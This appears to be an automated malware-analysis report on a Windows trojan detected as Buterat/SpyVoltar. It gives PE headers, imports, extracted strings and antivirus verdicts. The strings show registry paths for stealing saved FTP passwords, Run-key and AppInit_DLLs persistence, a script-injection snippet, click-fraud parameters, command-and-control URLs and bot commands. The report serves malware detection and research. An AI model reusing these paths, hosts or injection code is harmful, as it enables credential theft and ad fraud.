PE Compile Time (taken from the PE header's TimeDateStamp; this value is trivially forged, so treat it as a hint rather than evidence of when the binary was built)

2012-12-02 15:40:16

PE Imphash

1db674aa41c8b017c09ab688b75ba41b

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000cc68 0x0000ce00 6.63491307637
.rdata 0x0000e000 0x0000210a 0x00002200 4.42315500058
.data 0x00011000 0x0001793c 0x00000200 3.61727362724

Imports

Library WININET.dll:
0x40e178 HttpSendRequestW
0x40e17c InternetConnectW
0x40e180 HttpOpenRequestW
0x40e188 InternetCloseHandle
0x40e190 InternetOpenW
0x40e194 InternetReadFile
0x40e19c InternetOpenUrlW
0x40e1a4 InternetSetOptionW
Library SHLWAPI.dll:
0x40e124 StrStrIW
0x40e128 PathMatchSpecW
0x40e12c PathCombineW
0x40e130 wvnsprintfW
0x40e134 StrStrIA
0x40e138 PathRemoveFileSpecW
Library KERNEL32.dll:
0x40e01c TerminateProcess
0x40e020 GetCurrentProcess
0x40e028 IsDebuggerPresent
0x40e02c GetVersionExA
0x40e030 GetFileSize
0x40e034 RtlUnwind
0x40e038 WideCharToMultiByte
0x40e03c MultiByteToWideChar
0x40e040 HeapCreate
0x40e044 CopyFileW
0x40e048 CreateThread
0x40e050 DeleteFileW
0x40e054 CreateProcessW
0x40e05c GetLastError
0x40e060 ExitProcess
0x40e064 LoadLibraryW
0x40e068 GetProcAddress
0x40e06c Sleep
0x40e070 VirtualProtect
0x40e080 SetFilePointer
0x40e084 SetEndOfFile
0x40e088 HeapAlloc
0x40e08c GetVersionExW
0x40e090 SetWaitableTimer
0x40e09c HeapFree
0x40e0a0 ReadFile
0x40e0a4 FindNextFileW
0x40e0a8 GetModuleFileNameW
0x40e0ac WaitForSingleObject
0x40e0b4 GetFileTime
0x40e0b8 CreateFileW
0x40e0bc GetTickCount
0x40e0c0 CloseHandle
0x40e0c4 GetFileSizeEx
0x40e0c8 VirtualFree
0x40e0cc GetProcessHeap
0x40e0d4 VirtualAlloc
0x40e0d8 HeapReAlloc
0x40e0dc GetSystemTime
0x40e0e0 VirtualQuery
0x40e0e4 FindClose
0x40e0e8 WriteFile
0x40e0ec GetLocalTime
0x40e0f0 FindFirstFileW
0x40e0f4 GetModuleHandleW
0x40e0f8 OpenMutexW
0x40e0fc GetCommandLineW
0x40e100 CreateMutexW
Library USER32.dll:
0x40e140 GetWindowLongW
0x40e144 DispatchMessageW
0x40e148 GetForegroundWindow
0x40e14c CharLowerW
0x40e150 CreateWindowExW
0x40e154 FindWindowW
0x40e158 PeekMessageW
0x40e15c SetForegroundWindow
0x40e160 GetSystemMetrics
0x40e164 MessageBoxW
0x40e168 SetWindowPos
0x40e16c SetWindowLongW
0x40e170 SetParent
Library ADVAPI32.dll:
0x40e000 RegCloseKey
0x40e004 RegOpenKeyExW
0x40e008 RegQueryValueExW
0x40e00c RegSetValueExW
0x40e010 RegCreateKeyExW
0x40e014 RegEnumKeyExW
Library SHELL32.dll:
0x40e11c SHGetFolderPathW
Library ole32.dll:
0x40e1ac CoCreateInstance
0x40e1b0 OleInitialize
0x40e1b4 CoInitialize
Library OLEAUT32.dll:
0x40e108 SysAllocString
0x40e10c VariantInit
0x40e110 SysFreeString
0x40e114 VariantClear

!This program cannot be run in DOS mode.
`.rdata
@.data
Vj VVV
QPQQj2
VPVVj8
GVPVVQ
QPQQj6
EpPSj-
EX9E\~
F;5TPA
t|f97tw
D$ ;D$
AAFFHu
QQSVW3
Pj"j^[S
Pj"j^[S
WShh=B
QWShHKA
Qj"j^^V
QVh ?B
QSVhxBB
QVhPAB
Qj"j^^V
QWVhH2A
Pj"j^[S
Pj"j^[S
QWSh`FB
Pj"j^[S
QWShXPA
Pj"j^[S
QWSh(MA
MpQWj^
Pj"j^^V
QVh(PA
QWVhP0B
QVh@=B
PVVj VVV
YYu9!D$
D$,vT2
ttSVj@P
YtFVh
t'h$PA
u%AAFFB;
URPQQhX
;t$,v-
UQPXY]Y[
VC20XC00U
Gu/wIu]JGu
Gu-JGu
4Gu BGu
zGu+IGu"
Gu_CGu
)IusAGuH
Iu~ZGu
TGuPIGu6
GuZFGu
DGu\?Gu
ZGuZDGuBDGu
ZGu5DGu
4GuQQGu#RGuLBGu
AtlAxWinInit
AtlAxAttachControl
AtlAxGetControl
;password=
;user=
;port=
;server=
__scMMdj490)0-Osd
InternetQueryDataAvailable
InternetOpenUrlW
InternetCloseHandle
InternetAttemptConnect
InternetOpenW
InternetReadFile
InternetConnectW
HttpSendRequestW
InternetSetOptionW
HttpOpenRequestW
InternetSetPerSiteCookieDecisionW
InternetClearAllPerSiteCookieDecisions
WININET.dll
StrStrIA
PathRemoveFileSpecW
StrStrIW
PathMatchSpecW
PathCombineW
wvnsprintfW
SHLWAPI.dll
DeleteFileW
CreateProcessW
SetUnhandledExceptionFilter
GetLastError
ExitProcess
LoadLibraryW
GetProcAddress
VirtualProtect
GetPrivateProfileIntW
ExpandEnvironmentStringsW
GetPrivateProfileStringW
SetFilePointer
SetEndOfFile
HeapAlloc
GetVersionExW
SetWaitableTimer
SystemTimeToFileTime
CreateWaitableTimerW
HeapFree
ReadFile
FindNextFileW
GetModuleFileNameW
WaitForSingleObject
GetTimeZoneInformation
GetFileTime
CreateFileW
GetTickCount
CloseHandle
GetFileSizeEx
VirtualFree
GetProcessHeap
GetCurrentDirectoryW
VirtualAlloc
HeapReAlloc
GetSystemTime
GetFileSize
FindClose
WriteFile
GetLocalTime
FindFirstFileW
GetModuleHandleW
OpenMutexW
GetCommandLineW
CreateMutexW
WaitForMultipleObjects
CreateThread
CopyFileW
HeapCreate
MultiByteToWideChar
WideCharToMultiByte
KERNEL32.dll
GetSystemMetrics
MessageBoxW
SetWindowPos
SetWindowLongW
PeekMessageW
GetWindowLongW
DispatchMessageW
GetForegroundWindow
CharLowerW
CreateWindowExW
FindWindowW
SetParent
SetForegroundWindow
USER32.dll
RegEnumKeyExW
RegCloseKey
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
RegCreateKeyExW
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
CoCreateInstance
OleInitialize
CoInitialize
ole32.dll
OLEAUT32.dll
RtlUnwind
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
GetVersionExA
VirtualQuery
&ref=%s&real_refer=%s
&real_refer=%s
&condition_id=
&kwtype=
&ref=%s
From: true
^client=
From:
lfolder
SOFTWARE\smartftp\client 2.0\settings\backup
personal favorites
SOFTWARE\smartftp\client 2.0\settings\general\favorites
Password
FavoriteItem
ftp*commander*
ftplist.txt
portnumber
SOFTWARE\martin prikryl\winscp 2\sessions
hostname
SOFTWARE\Far2\Plugins\ftp\hosts
SOFTWARE\Far\Plugins\ftp\hosts
*filezilla*
/*/*/Server
*ghisler*
*total*commander*
*totalcmd*
installdir
ftpininame
SOFTWARE\Ghisler\Total Commander
password
username
default
connections
wcx_ftp.ini
*flashfxp*
datafolder
SOFTWARE\FlashFXP\3
history.dat
quick.dat
sites.dat
yA36zA48dEhfrvghGRg57h5UlDv3
ftp://%S:%S@%S:%u
ftp://%s:%s@%s
ftp://%s:%s@%s:%u
PriorHost
TimeCorr
UniqueNum
http://
AppEvents\Schemes\Apps\Explorer\Navigating\.current
SOFTWARE\Classes\MIME\Database\Content Type\
text/html
application/x-javascript
text/javascript
SOFTWARE\Microsoft\Internet Explorer
JOB FILE
^nocrypt
Page generated at:
setvar
msec1970
b_nav_time
Software\Microsoft\Windows NT\CurrentVersion\Windows
AppInit_DLLs
C:\WINDOWS\system32\gbdwpbm.dll
var scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);
&host=
track_events
javascript
begun.ru/click.jsp?url=
an.yandex.ru/count
_blank
"domain"
"encrypted"
"condition_id"
"kwtype"
<domain>
</domain>
</url>
<title>
</title>
http://click0
Shell.Explorer
AtlAxWin
eventConn
Shell_TrayWnd
Accept: */*
Referer:
Accept-Language: ru-RU
Accept-Encoding: gzip, deflate
User-Agent:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%SystemRoot%\System32\%s.exe
%APPDATA%\%s.exe
/updatefile3
\netprotdrvss.exe
job^rev=%s^os=%s
http://ow5dirasuek.com/
http://mkkuei4kdsz.com/
http://gysopui.net/
http://gysopui.net/
begun.ru
confirm^rev=%s^code=%s^param=%s^os=%s
jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
^rcn=1
ZORKASITE
BEGUNFEED
REKLOSOFT
TEASERNET
LUXUPXML
SUPERPOISK
DIRECTST
LIVINETCH
UPDATE
DOWNRUN
CLIENTDEL
PRIORITYHOST
GRABFTPS
RECONNECT
COOKREJCT
DESTROY
Antivirus Signature
Lionic Trojan.Win32.Dacic.4!c
Elastic malicious (high confidence)
ClamAV Win.Malware.Ulise-7170100-0
CMC Clean
CAT-QuickHeal Backdoor.ButeratPMF.S28341189
Skyhigh BehavesLike.Win32.Dropper.kh
ALYac Generic.Dacic.1A7FA519.A.F09F2FBB
Cylance Unsafe
Zillya Trojan.SpyVoltar.Win32.450
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Clean
K7GW Trojan ( 005b5adb1 )
K7AntiVirus Trojan ( 005b5adb1 )
huorong Trojan/Vundo.v
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec Infostealer.Scapzilla
tehtris Clean
ESET-NOD32 a variant of Win32/SpyVoltar.B
APEX Malicious
Avast Win32:Buterat-WQ [Trj]
Cynet Malicious (score: 100)
Kaspersky UDS:Trojan.Win32.Generic
BitDefender Generic.Dacic.1A7FA519.A.F09F2FBB
NANO-Antivirus Trojan.Win32.Butirat.kylcit
ViRobot Clean
MicroWorld-eScan Generic.Dacic.1A7FA519.A.F09F2FBB
Tencent Trojan.Win32.Spyvoltar.a
Sophos Troj/Buterat-E
F-Secure Heuristic.HEUR/AGEN.1366724
DrWeb BackDoor.Butirat.245
VIPRE Generic.Dacic.1A7FA519.A.F09F2FBB
TrendMicro Clean
McAfeeD Real Protect-LS!FB4A6E7DC2E6
Trapmine suspicious.low.ml.score
CTX exe.unknown.dacic
Emsisoft Generic.Dacic.1A7FA519.A.F09F2FBB (B)
Ikarus Virus.Win32.Vundo
GData Win32.Trojan.PSE.14IDQ4O
Jiangmin Trojan.Generic.hkwfh
Webroot W32.Trojan.Gen
Varist W32/S-b6e4fd03!Eldorado
Avira HEUR/AGEN.1366724
Antiy-AVL Trojan/Win32.SpyVoltar
Kingsoft malware.kb.a.992
Gridinsoft Trojan.Win32.Downloader.oa!s1
Xcitium TrojWare.Win32.Neconyd.A@8a2d6k
Arcabit Generic.Dacic.1A7FA519.A.F09F2FBB
SUPERAntiSpyware Trojan.Agent/Gen-Downloader
ZoneAlarm Troj/Buterat-E
Microsoft Trojan:Win32/ButeRat!pz
Google Detected
AhnLab-V3 Trojan/Win32.Vundo.C223194
Acronis suspicious
VBA32 BScope.Backdoor.Butirat
TACHYON Trojan/W32.Vundo.62976.I
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Genetic.gen
Zoner Clean
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9f
Rising Trojan.Clicker!1.BC6E (CLASSIC)
Yandex Trojan.GenAsa!BAn0u5Y1fdo
TrellixENS GenericRXHT-PZ!FB4A6E7DC2E6
SentinelOne Static AI - Malicious PE
MaxSecure Clean
Fortinet W32/SpyVoltar.B!tr
AVG Win32:Buterat-WQ [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan[downloader]:Win/ButeRat.Gen
IRMA Signature
Trend Micro SProtect (Linux) Clean
Avast Core Security (Linux) Win32:Buterat-WQ [Trj]
C4S ClamAV (Linux) Win.Malware.Ulise-7170100-0
Trellix (Linux) GenericRXHT-PZ
Sophos Anti-Virus (Linux) Troj/Buterat-E
Bitdefender Antivirus (Linux) Generic.Dacic.1A7FA519.A.F09F2FBB
G Data Antivirus (Windows) Virus: Generic.Dacic.1A7FA519.A.F09F2FBB (Engine A), Win32.Trojan.PSE.14IDQ4O (Engine B)
WithSecure (Linux) Heuristic.HEUR/AGEN.1366724
ESET Security (Windows) a variant of Win32/SpyVoltar.B trojan
DrWeb Antivirus (Linux) BackDoor.Butirat.245
ClamAV (Linux) Clean
eScan Antivirus (Linux) Generic.Dacic.1A7FA519.A.F09F2FBB(DB)
Kaspersky Standard (Windows) HEUR:Trojan.Win32.Generic
Emsisoft Commandline Scanner (Windows) Generic.Dacic.1A7FA519.A.F09F2FBB (B)
Cuckoo
